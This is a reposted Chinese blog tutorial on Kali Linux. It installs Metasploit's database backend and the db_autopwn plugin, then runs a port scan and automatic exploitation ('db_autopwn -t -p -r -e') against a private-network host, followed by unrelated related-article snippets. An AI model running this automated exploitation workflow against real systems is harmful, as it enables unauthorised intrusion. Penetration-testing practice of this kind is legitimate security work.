【研究】Metasploit自动攻击模块

【研究】Metasploit自动攻击模块

news/2025/4/4 1:20:37/文章来源:https://blog.csdn.net/weixin_30445169/article/details/97775645

环境：kali-linux-2017.3-vm-amd64

一、安装postgresql数据库

apt-get install postgresql

apt-get install rubygems libpq-dev

apt-get install libreadline-dev

apt-get install libssl-dev

apt-get install libpq5

apt-get install ruby-dev

apt-get install libpq-dev

直接全部copy到kali中执行即可

二、自动配置数据库

service postgres start 启动服务

msfdb init 自动创建数据库、用户、密码

三、手动配置数据库

passwd postgres 修改postgresql数据库密码

su postgres 进入数据库

createuser hello –P 创建用户hello，并设置密码

createdb --owner=hello db_hello 给用户hello创建一个数据库db_hello

psql db_hello 进入db_hello数据库

四、安装db_autopwn.rb模块

cd /usr/share/metasploit-framework/plugins 定位到msf插件目录

git clone https://github.com/hahwul/metasploit-db_autopwn.git 安装db_autopwn

cd metasploit-db_autopwn

mv db_autopwn.rb /usr/share/metasploit-framework/plugins

打开msfconsole，查看db_autopwn是否安装成功，执行如下命令：

load db_autopwn 出现下图结果说明安装成功

五、借助db_autopwn进行自动加载模块进行攻击

msfconsole

use auxiliary/scanner/portscan/tcp 调用tcp扫描模块

set rhosts 192.168.1.28

set threads 10

exploit

自动加载模块

db_autopwn –t –p –r –e

转载于:https://www.cnblogs.com/peterpan0707007/p/8084981.html

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/399066.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

用JS获取地址栏参数的方法

用JS获取地址栏参数的方法

用JS获取地址栏参数的方法（超级简单）方法一：采用正则表达式获取地址栏参数：（ 强烈推荐，既实用又方便！） function GetQueryString(name){var reg new RegExp("(^|&)" …

阅读更多...

php curl_init不能用,curl_init（）函数不起作用

php curl_init不能用,curl_init（）函数不起作用

curl_init()函数不起作用嗨，我在POST请求中尝试PHP Post Request，认为它可能对我有用，我的代码如下所示$sub_req_url "http://localhost/index1.php";$ch curl_init($sub_req_url);$encoded ;// include GET as well as POST va…

阅读更多...

php修改session生存时间,修改session的过期(生存)时间

php修改session生存时间,修改session的过期(生存)时间

以下我以php为例，万变不离其宗，希望对大家都有用吧。session与cookie:了解过两者的众所都知道，有些信息保存到cookie，有些出于安全问题就不能直接存到浏览器，这就要用到session了。然而对于浏览器，一般都是…

阅读更多...

让nginx支持thinkphp rewrite模式

让nginx支持thinkphp rewrite模式

为什么80%的码农都做不了架构师？>>> Nginx环境在Nginx低版本中，是不支持PATHINFO的，但是可以通过在Nginx.conf中配置转发规则实现：在nginx配置文件中添加 location / { if (!-e $request_filename) { rewrite ^(…

阅读更多...

WPS怎样设置多级标题（如四级标题）

WPS怎样设置多级标题（如四级标题）

WPS期初，乍一看最多只能设置三级标题。怎样设置四级以上标题呢？ 这里以设置四级标题为例： 点击‘视图’->大纲, 假如，现在2.3.3这一行是三级标题： 在下拉框里选择‘4级’就可以了。现在可以回到普通页面上&#x…

阅读更多...

tomcat关闭后线程依然运行解决办法

tomcat关闭后线程依然运行解决办法

tomcat关闭后线程依然运行解决办法，设置线程为守护线程守护线程与非守护线程最近在看多线程的Timer章节，发现运用到了守护线程，感觉Java的基础知识还是需要补充。 Java分为两种线程：用户线程和守护线程所谓守护线程是指在程序运…

阅读更多...

一维有限元法matlab,有限元matlab研究.ppt

一维有限元法matlab,有限元matlab研究.ppt

* 有限元方法——介绍有限元方法是数值求解偏微分方程边值问题的一种方法，此方法首先于20世纪50年代初由工程师提出，并用于求解简单的结构问题。有限元方法是这一种系统的数值方法，并奠定其数学基础，是在60年代中期以冯康先生为代…

阅读更多...

matlab实现主成分分析（遥感图像处理）

matlab实现主成分分析（遥感图像处理）

数据说明：采用的数据源是从别人那里拷的2012年全年的Sea Surface Temperature（海标温度，SST）数据，一直想找一份比较好的主成分分析数据，也没找到。 Matlab自身有主成分分析的函数princomp，其中返…

阅读更多...

Struts1和Struts2的区别和对比（完整版）（转）

Struts1和Struts2的区别和对比（完整版）（转）

Struts1和Struts2的区别和对比（完整版）（转） Struts1和Struts2的区别和对比:Action 类: • Struts1要求Action类继承一个抽象基类。Struts1的一个普遍问题是使用抽象类编程而不是接口，而struts2的Action是接口。 • Str…

阅读更多...

SQL Server中关于跟踪（Trace)那点事

SQL Server中关于跟踪（Trace)那点事

前言一提到跟踪俩字，很多人想到警匪片中的场景，同样在我们的SQL Server数据库中“跟踪”也是无处不在的，如果我们利用好了跟踪技巧，就可以针对某些特定的场景做定向分析，找出充足的证据来破案。简单的举几个应用场景…

阅读更多...

php怎么获取用户所在地址,php获取客户端ip及获取ip所在地址

php怎么获取用户所在地址,php获取客户端ip及获取ip所在地址

// 获取ipfunction ip(){if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]))$ip $_SERVER["HTTP_X_FORWARDED_FOR"];else if (isset($_SERVER["HTTP_CLIENT_IP"]))$ip $_SERVER["HTTP_CLIENT_IP"];else$ip $_SERVER["REMOTE_ADDR&…

阅读更多...

linux中的rm 删除命令

linux中的rm 删除命令

1.rm 不仅可以删除目录还可以删除文件-f, --force 强制删除。忽略不存在的文件，不提示确认-i 在删除前需要确认-I 在删除超过三个文件或者递归删除前要求确认。此选项比-i 提示内容更少&a…

阅读更多...

在Windows上面安装多个Memcached

在Windows上面安装多个Memcached

在Windows上面安装多个Memcached sc create "memcached Server3" start auto binPath "D:\memcached-1.4.4\memcached.exe -d runservice -m 32 -p 22122" DisplayName "memcached Server3" 转载于:https://www.cnblogs.com/stono/p/8092765.ht…

阅读更多...

前端面试

前端面试

1、如何理解js的闭包 2、js的事件冒泡 3、jquery的跨域请求 4、margin和padding的区别 5,、用过哪些前端框架转载于:https://www.cnblogs.com/iwenwen/p/3959677.html

阅读更多...

PHP实现可示化代码

PHP实现可示化代码

PHP是一种服务器端脚本语言，它主要用于开发Web应用程序。虽然PHP本身不提供可视化代码的功能，但你可以使用一些第三方库和工具来实现可视化代码。以下是一些常用的PHP可视化代码的工具和库： 1. Graphviz：Graphviz是一个开源的可…

阅读更多...

php若$a没定义默认是,PHP之错误处理详解

php若$a没定义默认是,PHP之错误处理详解

PHP之错误处理详解错误报告PHP程序的错误发生一般归属于下列三个领域：1、语法错误语法错误最常见，并且也容易修复。如：代码中遗漏一个分号。这类错误会阻止脚本的执行2、运行时错误这种错误一般不会阻止PHP脚本的执行，但会阻止当前…

阅读更多...

热血沙城－3.2移植-古月－cocos2dx源码

热血沙城－3.2移植-古月－cocos2dx源码

最近发现我去年学习2dx的时候移植过的一个游戏现在被放在网上出售真是有点想笑本人比较喜欢武侠风格的游戏，当时9秒开源了热血沙城本着学习的态度从2.1.2移植到3.2 用了一周的时间中间各种报错大概修改了1000多处错误同时增加了支持摇杆后来放到9秒上开源&…

阅读更多...

【openjudge 1.11 07】和为给定数

【openjudge 1.11 07】和为给定数

我看到这个的第一反应就是爆搜，然后写了一个没加$No$的4分程序 #include <bits/stdc.h> #include <algorithm> #define it int #define fr for #define il inline using namespace std; it book[100020],t[100020]; it spe[50010]; it n,m,bz0; it main…

阅读更多...

tcp http socket

tcp http socket

1、TCP连接手机能够使用联网功能是因为手机底层实现了TCP/IP协议，可以使手机终端通过无线网络建立TCP连接。TCP协议可以对上层网络提供接口，使上层网络数据的传输建立在“无差别”的网络之上。建立起一个TCP连接需要经过“三次握手”： 第一…

阅读更多...

php文件多上传文件,php文件上传（多文件上传）

php文件多上传文件,php文件上传（多文件上传）

http://www.cnblogs.com/itcx/p/4209034.htmlupload.phpclass File_upload{public $upload_path./upload/;//上传文件的路径public $allow_typearray();//允许上传的文件类型public $max_size20480;//允许的最大文件大小public $overwritefalse;//是否设置成覆盖模式public $re…

阅读更多...

最新文章